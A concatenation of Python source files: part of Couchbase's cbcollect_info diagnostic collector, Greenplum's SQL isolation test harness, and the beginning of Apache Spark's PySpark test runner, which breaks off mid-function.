from distutils.spawn import find_executable
lookup_cmd = None
for cmd in ["dig", "nslookup", "host"]:
if find_executable(cmd) is not None:
lookup_cmd = cmd
break
lookup_tasks = []
if lookup_cmd is not None:
lookup_tasks = [UnixTask("DNS lookup information for %s" % node,
"%(lookup_cmd)s '%(node)s'" % locals())
for node in correct_split(read_guts(guts, "nodes"), ",")]
query_tasks = []
query_port = read_guts(guts, "query_port")
if query_port:
def make(statement):
return make_query_task(statement, user="@",
password=read_guts(guts, "memcached_pass"),
port=query_port)
query_tasks = [make("SELECT * FROM system:datastores"),
make("SELECT * FROM system:namespaces"),
make("SELECT * FROM system:keyspaces"),
make("SELECT * FROM system:indexes")]
index_tasks = []
index_port = read_guts(guts, "indexer_http_port")
if index_port:
url = 'http://127.0.0.1:%s/getIndexStatus' % index_port
index_tasks = [make_curl_task(name="Index definitions are: ",
user="@", password=read_guts(guts, "memcached_pass"), url=url)]
fts_tasks = []
fts_port = read_guts(guts, "fts_http_port")
if fts_port:
url = 'http://127.0.0.1:%s/api/diag' % fts_port
fts_tasks = [make_curl_task(name="FTS /api/diag: ",
user="@", password=read_guts(guts, "memcached_pass"), url=url)]
_tasks = [
UnixTask("Directory structure",
["ls", "-lRai", root]),
UnixTask("Database directory structure",
["ls", "-lRai", dbdir]),
UnixTask("Index directory structure",
["ls", "-lRai", viewdir]),
UnixTask("couch_dbinfo",
["find", dbdir, "-type", "f",
"-name", "*.couch.*",
"-exec", "couch_dbinfo", "{}", "+"]),
LinuxTask("Database directory filefrag info",
["find", dbdir, "-type", "f", "-exec", "filefrag", "-v", "{}", "+"]),
LinuxTask("Index directory filefrag info",
["find", viewdir, "-type", "f", "-exec", "filefrag", "-v", "{}", "+"]),
WindowsTask("Database directory structure",
"dir /s " + winquote_path(dbdir)),
WindowsTask("Index directory structure",
"dir /s " + winquote_path(viewdir)),
WindowsTask("Version file",
"type " + winquote_path(basedir()) + "\\..\\VERSION.txt"),
WindowsTask("Manifest file",
"type " + winquote_path(basedir()) + "\\..\\manifest.txt"),
WindowsTask("Manifest file",
"type " + winquote_path(basedir()) + "\\..\\manifest.xml"),
LinuxTask("Version file", "cat '%s/VERSION.txt'" % root),
LinuxTask("Manifest file", "cat '%s/manifest.txt'" % root),
LinuxTask("Manifest file", "cat '%s/manifest.xml'" % root),
AllOsTask("Couchbase config", "", literal=read_guts(guts, "ns_config")),
AllOsTask("Couchbase static config", "", literal=read_guts(guts, "static_config")),
AllOsTask("Raw ns_log", "", literal=read_guts(guts, "ns_log")),
# TODO: just gather those in python
WindowsTask("Memcached logs",
"cd " + winquote_path(read_guts(guts, "memcached_logs_path")) + " && " +
"for /f %a IN ('dir /od /b memcached.log.*') do type %a",
log_file="memcached.log"),
UnixTask("Memcached logs",
["sh", "-c", 'cd "$1"; for file in $(ls -tr memcached.log.*); do cat \"$file\"; done', "--", read_guts(guts, "memcached_logs_path")],
log_file="memcached.log"),
[WindowsTask("Ini files (%s)" % p,
"type " + winquote_path(p),
log_file="ini.log")
for p in read_guts(guts, "couch_inis").split(";")],
UnixTask("Ini files",
["sh", "-c", 'for i in "$@"; do echo "file: $i"; cat "$i"; done', "--"] + read_guts(guts, "couch_inis").split(";"),
log_file="ini.log"),
make_curl_task(name="couchbase diags",
user="@",
password=read_guts(guts, "memcached_pass"),
timeout=600,
url=diag_url,
log_file="diag.log"),
make_curl_task(name="master events",
user="@",
password=read_guts(guts, "memcached_pass"),
timeout=300,
url='http://127.0.0.1:%s/diag/masterEvents?o=1' % read_guts(guts, "rest_port"),
log_file="master_events.log",
no_header=True),
make_curl_task(name="ale configuration",
user="@",
password=read_guts(guts, "memcached_pass"),
url='http://127.0.0.1:%s/diag/ale' % read_guts(guts, "rest_port"),
log_file="couchbase.log"),
[AllOsTask("couchbase logs (%s)" % name, "cbbrowse_logs %s" % name,
addenv=[("REPORT_DIR", read_guts(guts, "log_path"))],
log_file="ns_server.%s" % name)
for name in ["debug.log", "info.log", "error.log", "couchdb.log",
"xdcr.log", "xdcr_errors.log",
"views.log", "mapreduce_errors.log",
"stats.log", "babysitter.log", "ssl_proxy.log",
"reports.log", "xdcr_trace.log", "http_access.log",
"http_access_internal.log", "ns_couchdb.log",
"goxdcr.log", "query.log", "projector.log", "indexer.log",
"fts.log", "metakv.log"]],
[AllOsTask("memcached stats %s" % kind,
flatten(["cbstats", "-a", "127.0.0.1:%s" % read_guts(guts, "memcached_port"), kind, "-b", read_guts(guts, "memcached_admin"), "-p", read_guts(guts, "memcached_pass")]),
log_file="stats.log",
timeout=60)
for kind in ["all", "allocator", "checkpoint", "config",
"dcp", "dcpagg",
["diskinfo", "detail"], ["dispatcher", "logs"],
"failovers", ["hash", "detail"],
"kvstore", "kvtimings", "memory",
"prev-vbucket",
"runtimes", "scheduler",
"tap", "tapagg",
"timings", "uuid",
"vbucket", "vbucket-details", "vbucket-seqno",
"warmup", "workload"]],
[AllOsTask("memcached mcstat %s" % kind,
flatten(["mcstat", "-h", "127.0.0.1:%s" % read_guts(guts, "memcached_port"),
"-u", read_guts(guts, "memcached_admin"),
"-P", read_guts(guts, "memcached_pass"), kind]),
log_file="stats.log",
timeout=60)
for kind in ["connections"]],
[AllOsTask("ddocs for %s (%s)" % (bucket, path),
["couch_dbdump", path],
log_file="ddocs.log")
for bucket in set(correct_split(read_guts(guts, "buckets"), ",")) - set(correct_split(read_guts(guts, "memcached_buckets"), ","))
for path in glob.glob(os.path.join(dbdir, bucket, "master.couch*"))],
[AllOsTask("replication docs (%s)" % (path),
["couch_dbdump", path],
log_file="ddocs.log")
for path in glob.glob(os.path.join(dbdir, "_replicator.couch*"))],
[AllOsTask("Couchstore local documents (%s, %s)" % (bucket, os.path.basename(path)),
["couch_dbdump", "--local", path],
log_file="couchstore_local.log")
for bucket in set(correct_split(read_guts(guts, "buckets"), ",")) - set(correct_split(read_guts(guts, "memcached_buckets"), ","))
for path in glob.glob(os.path.join(dbdir, bucket, "*.couch.*"))],
[UnixTask("moxi stats (port %s)" % port,
"echo stats proxy | nc 127.0.0.1 %s" % port,
log_file="stats.log",
timeout=60)
for port in correct_split(read_guts(guts, "moxi_ports"), ",")],
[AllOsTask("mctimings",
["mctimings",
"-u", read_guts(guts, "memcached_admin"),
"-P", read_guts(guts, "memcached_pass"),
"-h", "127.0.0.1:%s" % read_guts(guts, "memcached_port"),
"-v"] + stat,
log_file="stats.log",
timeout=60)
for stat in ([], ["subdoc_execute"])],
make_stats_archives_task(guts, initargs_path)
]
_tasks = flatten([lookup_tasks, query_tasks, index_tasks, fts_tasks, _tasks])
return _tasks
def find_script(name):
dirs = [basedir(), os.path.join(basedir(), "scripts")]
for d in dirs:
path = os.path.join(d, name)
if os.path.exists(path):
log("Found %s: %s" % (name, path))
return path
return None
def get_server_guts(initargs_path):
dump_guts_path = find_script("dump-guts")
if dump_guts_path is None:
log("Couldn't find dump-guts script. Some information will be missing")
return {}
escript = exec_name("escript")
extra_args = os.getenv("EXTRA_DUMP_GUTS_ARGS")
args = [escript, dump_guts_path, "--initargs-path", initargs_path]
if extra_args:
args = args + extra_args.split(";")
print("Checking for server guts in %s..." % initargs_path)
p = subprocess.Popen(args, stdout=subprocess.PIPE)
output = p.stdout.read().decode(ENCODING_LATIN1, BACKSLASH_REPLACE)  # stdout is bytes; decode before splitting on NULs
p.wait()
# print("args: %s gave rc: %d and:\n\n%s\n" % (args, rc, output))
tokens = output.rstrip("\0").split("\0")
d = {}
if len(tokens) > 1:
for i in range(0, len(tokens), 2):
d[tokens[i]] = tokens[i+1]
return d
def guess_utility(command):
if isinstance(command, list):
command = ' '.join(command)
if not command:
return None
if re.findall(r'[|;&]|\bsh\b|\bsu\b|\bfind\b|\bfor\b', command):
# something hard to easily understand; let the human decide
return command
else:
return command.split()[0]
def dump_utilities(*args, **kwargs):
specific_platforms = {SolarisTask: 'Solaris',
LinuxTask: 'Linux',
WindowsTask: 'Windows',
MacOSXTask: 'Mac OS X'}
platform_utils = dict((name, set()) for name in list(specific_platforms.values()))
class FakeOptions(object):
def __getattr__(self, name):
return None
tasks = make_os_tasks([]) + make_product_task({}, "", FakeOptions())
for task in tasks:
utility = guess_utility(task.command)
if utility is None:
continue
for (platform, name) in list(specific_platforms.items()):
if isinstance(task, platform):
platform_utils[name].add(utility)
print("This is an autogenerated, possibly incomplete and flawed list of utilites used by cbcollect_info")
for (name, utilities) in sorted(list(platform_utils.items()), key=lambda x: x[0]):
print("\n%s:" % name)
for utility in sorted(utilities):
print(" - %s" % utility)
sys.exit(0)
def setup_stdin_watcher():
def _in_thread():
sys.stdin.readline()
AltExit.exit(2)
th = threading.Thread(target=_in_thread)
th.setDaemon(True)
th.start()
class CurlKiller:
def __init__(self, p):
self.p = p
def cleanup(self):
if self.p is not None:
print("Killing curl...")
os.kill(self.p.pid, signal.SIGKILL)
print("done")
def disarm(self):
self.p = None
def do_upload_and_exit(path, url, proxy):
f = open(path, 'rb')
# mmap the file to reduce the amount of memory required (see bit.ly/2aNENXC)
filedata = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
# Get proxies from environment/system
proxy_handler = urllib.request.ProxyHandler(urllib.request.getproxies())
if proxy != "":
# unless a proxy is explicitly passed, then use that instead
proxy_handler = urllib.request.ProxyHandler({'https': proxy, 'http': proxy})
opener = urllib.request.build_opener(proxy_handler)
request = urllib.request.Request(url, data=filedata.read(), method='PUT')
request.add_header(str('Content-Type'), str('application/zip'))
exit_code = 0
try:
url = opener.open(request)
if url.getcode() == 200:
log('Done uploading')
else:
raise Exception('Error uploading, expected status code 200, got status code: {0}'.format(url.getcode()))
except Exception as e:
log(traceback.format_exc())
exit_code = 1
filedata.close()
f.close()
sys.exit(exit_code)
def parse_host(host):
url = urllib.parse.urlsplit(host)
if not url.scheme:
url = urllib.parse.urlsplit('https://' + host)
return url.scheme, url.netloc, url.path
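# For example (hypothetical hosts):
#   parse_host("uploads.example.com/sgcollect")         -> ('https', 'uploads.example.com', '/sgcollect')
#   parse_host("http://uploads.example.com/sgcollect")  -> ('http', 'uploads.example.com', '/sgcollect')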
def generate_upload_url(parser, options, zip_filename):
upload_url = None
if options.upload_host:
if not options.upload_customer:
parser.error("Need --customer when --upload-host is given")
scheme, netloc, path = parse_host(options.upload_host)
customer = urllib.parse.quote(options.upload_customer)
fname = urllib.parse.quote(os.path.basename(zip_filename))
if options.upload_ticket:
full_path = '%s/%s/%d/%s' % (path, customer, options.upload_ticket, fname)
else:
full_path = '%s/%s/%s' % (path, customer, fname)
upload_url = urllib.parse.urlunsplit((scheme, netloc, full_path, '', ''))
log("Will upload collected .zip file into %s" % upload_url)
return upload_url
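# For example (hypothetical values): with --upload-host=uploads.example.com/sgcollect,
# --customer=Acme and a ticket number of 12345, a file named sgcollect.zip is uploaded to:
#   https://uploads.example.com/sgcollect/Acme/12345/sgcollect.zip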
def check_ticket(option, opt, value):
if re.match(r'^\d{1,7}$', value):
return int(value)
else:
raise optparse.OptionValueError(
"option %s: invalid ticket number: %r" % (opt, value))
class CbcollectInfoOptions(optparse.Option):
from copy import copy
TYPES = optparse.Option.TYPES + ("ticket",)
TYPE_CHECKER = copy(optparse.Option.TYPE_CHECKER)
TYPE_CHECKER["ticket"] = check_ticket
def find_primary_addr(default=None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
try:
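# Note: connect() on a UDP socket sends no packets; it only makes the kernel
# pick the local address that would be used to reach 8.8.8.8, which
# getsockname() then reports.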
s.connect(("8.8.8.8", 56))
addr, port = s.getsockname()
return addr
except socket.error:
return default
finally:
s.close()
def exec_name(name):
if sys.platform == 'win32':
name += ".exe"
return name
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pygresql.pg
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>Uq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close()
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print >>self.out_file, " <... completed>"
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_session_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pygresql.pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname)
else:
con = pygresql.pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname)
break
except Exception as e:
if (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
return con
def get_utility_mode_port(self, name):
"""
Gets the (hostname, port) combination of the segment with
content id = name and role = primary.
"""
con = self.connectdb(self.dbname)
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE content = %s and role = 'p'" % name).getresult()
if len(r) == 0:
raise Exception("Invalid content %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
This is pretty dirty, but apparently the only way
to get the pretty output of the query result.
The reason is that, for some Python-internal reason,
print(r) calls the correct function while neither str(r)
nor repr(r) outputs anything useful.
FIXME: once we upgrade to a modern pygresql this can probably go
away entirely; it looks like 5.0 may have consolidated the
internal print/str code.
"""
with tempfile.TemporaryFile() as f:
print >>f, r
f.seek(0) # rewind
ppr = f.read()
return ppr.strip() + "\n"
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, self.printout_result(r))
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when an empty command is received.
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, utility_mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pygresql.pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p'").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specified, it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print >> output_file
if mode == '\\retcode':
print >> output_file, '-- start_ignore'
print >> output_file, stdout
if mode == '\\retcode':
print >> output_file, '-- end_ignore'
print >> output_file, '(exited with code {})'.format(cmd_output.returncode)
else:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
self.get_process(output_file, name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "U&":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).fork(sql.strip(), True)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, utility_mode=True, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
#tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
else:
command_part = line.partition("--")[0] # remove comment from line
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line) or re.match(r"^-?\d+U[q\\<]:$", line):
command += command_part
try:
self.process_command(command, output_file)
except Exception as e:
print >>output_file, "FAILED: ", e
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections). In 'U' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode query on the master and all primaries.
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
    a transaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
    SQLIsolationTestCase would output "INSERT 1". As
    SQLIsolationTestCase needs more fine-grained control
    over the execution order than is possible with psql, it uses
    the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
    2. If you want a specific session to be connected to a specific database, specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
    Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For example, the following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
    in the middle of the test execution, you can specify the flag 'q' with the session identifier. For example:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
        Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file, runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
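# Illustrative usage sketch (hypothetical subclass; assumes the TINC SQLTestCase
# machinery referenced above -- get_out_dir(), db_name, gucs, test_artifacts --
# is provided by the surrounding test infrastructure):
#
#   class ConcurrentDeleteTest(SQLIsolationTestCase):
#       sql_dir = 'sql/'
#       ans_dir = 'expected/'
#
# Each isolation spec in sql_dir would then be run through run_sql_file() and
# its .out diffed against the matching answer file.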
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
(options, args) = parser.parse_args()
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout)
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser, OptionGroup
import os
import re
import shutil
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
import uuid
if sys.version < '3':
import Queue
else:
import queue as Queue
from collections import deque
from multiprocessing import Manager
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
SKIPPED_TESTS = Manager().dict()
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
# Later, add back 2.12 to this list:
# for scala in ["2.11", "2.12"]:
for scala in ["2.11"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(target_dir, test_name, pyspark_python, failed_tests_deque):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
# Create a unique temp directory under 'target/' for each run. The TMPDIR variable is
# recognized by the tempfile module to override the default system temp directory.
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
while os.path.isdir(tmp_dir):
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
os.mkdir(tmp_dir)
env["TMPDIR"] = tmp_dir
# Also override the JVM's temp directory by setting driver and executor options.
spark_args = [
"--conf", "spark.driver.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"--conf", "spark.executor.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"pyspark-shell"
]
env["PYSPARK_SUBMIT_ARGS"] = " ".join(spark_args)
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
    # This file must be created before the try block; it shouldn't be closed before 'worker' is done
per_test_output = tempfile.TemporaryFile()
try:
process = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
# bufsize must be 0 (unbuffered), 1 (line buffered) doesn't seem to work
stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env, bufsize=0,
universal_newlines=True)
def consume_log(output):
for line in process.stdout:
print("({}) {} - {}".format(pyspark_python, test_name, line), end=b'')
